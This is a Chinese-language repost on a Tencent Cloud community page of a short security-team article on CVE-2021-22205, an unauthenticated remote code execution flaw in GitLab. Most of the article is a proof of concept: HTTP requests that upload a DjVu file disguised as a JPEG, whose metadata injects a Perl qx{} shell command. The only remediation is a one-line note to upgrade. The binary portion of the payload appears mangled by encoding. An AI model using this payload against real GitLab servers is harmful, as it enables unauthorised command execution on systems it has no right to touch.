前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2021-22205 GitLab未授权 RCE

CVE-2021-22205 GitLab未授权 RCE

作者头像
Khan安全团队
发布2021-11-05 10:35:18
8550
发布2021-11-05 10:35:18
举报
文章被收录于专栏:Khan安全团队

参考: https://hackerone.com/reports/1154542

获取X-CSRF-Token

代码语言:javascript
复制
GET /users/sign_in

RCE

代码语言:javascript
复制
POST /uploads/user
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: {{csrf-token}}
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg

AT&TFORM  疍JVMDIRM   .?    F   ?蘅?!葢N?亿堣k鍰,q領觧暯⒚"?FORM   ^DJVUINFO   
   d  INCL   shared_anno.iff BG44    J  婃岜7?*? BG44   鶡BG44   
FORM  DJVIANTa  P(metadata
  (Copyright "\
" . qx{echo vakzz >/tmp/vakzz} . \
" b ") )

修复建议:

GitLab 版本 13.10.3已修复更新

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-10-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档